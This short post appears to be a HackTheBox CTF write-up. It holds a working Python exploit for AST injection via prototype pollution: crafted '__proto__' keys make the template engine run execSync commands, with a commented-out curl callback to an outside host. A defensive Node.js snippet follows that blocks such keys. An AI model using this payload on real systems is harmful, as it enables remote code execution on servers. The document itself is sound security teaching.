Here is an AST Injection example. The exploit relied on the error output of the target.
It was used in a HackTheBox CTF.
For further information, please consider reading this article:
https://blog.p6.is/AST-Injection/
Have a nice day!
```python
#!/usr/bin/env python

import requests

TARGET_URL = 'http://docker.hackthebox.eu:32561'

# make pollution: the dotted keys are walked by the server's setter until
# they land on Object.prototype, where the template engine later reads them
r = requests.post(TARGET_URL + '/api/submit', json={
    "artist.__proto__.prototype.type": "Program",
    "artist.__proto__.name": "Haigh",
    # "__proto__.name": "process.mainModule.require('child_process').execSync(`curl 'http://devilinside.me:8080/'`)",
    "artist.__proto__.body": [{
        "type": "MustacheStatement",
        "path": 0,
        "params": [{
            "type": "NumberLiteral",
            "value": "process.mainModule.require('child_process').execSync(`sh -c 'whoami'`)"
        }],
        "loc": {
            "start": 0,
            "end": 0
        }
    }]
})
# the response (including the error output) shows whether the pollution took
print(r.text)

# execute: rendering the front page now compiles the polluted AST
r = requests.get(TARGET_URL)
# print(r.text)
print("done")
```
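As an added defensive counterpart (not code from the original post or the challenge), the following Node.js snippet shows what a hardened `/api/submit` handler would do with a body like the one above: detect dotted keys that pass through `__proto__`, `constructor` or `prototype`, and use a setter that cannot reach `Object.prototype`. The handler shape and sample bodies are assumptions.

```javascript
// Added defensive example, not code from the original post or the challenge.
// The exploit above relies on dotted keys such as "artist.__proto__.body" being
// walked by a setter until they reach Object.prototype; this rejects such keys.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);

// Return a slash-joined path to the first key whose dotted segments contain a
// prototype-polluting name, or null when the parsed body is clean.
function findPollutingKey(value, path = []) {
  if (value === null || typeof value !== 'object') return null;
  for (const [key, child] of Object.entries(value)) {
    if (key.split('.').some((seg) => BLOCKED.has(seg))) return path.concat(key).join('/');
    const hit = findPollutingKey(child, path.concat(key));
    if (hit) return hit;
  }
  return null;
}

// Dotted-path setter that refuses blocked segments and only creates
// prototype-less intermediate objects, so it can never reach Object.prototype.
function safeSet(target, dottedKey, value) {
  const parts = dottedKey.split('.');
  if (parts.some((p) => BLOCKED.has(p))) throw new Error(`blocked key: ${dottedKey}`);
  let cur = target;
  for (const p of parts.slice(0, -1)) {
    if (!Object.prototype.hasOwnProperty.call(cur, p)) cur[p] = Object.create(null);
    cur = cur[p];
  }
  cur[parts[parts.length - 1]] = value;
  return target;
}

// What a hardened /api/submit handler would do with the parsed JSON body:
// reject the request outright if any key could pollute, otherwise store it.
function applySubmission(body) {
  const bad = findPollutingKey(body);
  if (bad) return { ok: false, reason: `blocked key ${bad}` };
  const record = Object.create(null);
  for (const [k, v] of Object.entries(body)) safeSet(record, k, v);
  return { ok: true, record };
}

// Constructed sample bodies; the first mirrors the key shape of the exploit.
const pollutedBody = { 'artist.__proto__.body': [{ type: 'MustacheStatement' }] };
const benignBody = { 'artist.name': 'Haigh', 'artist.tags': ['jazz'] };
```

Bodies parsed with `JSON.parse` can also carry a literal own `__proto__` property inside nested objects, which the recursive walk catches as well.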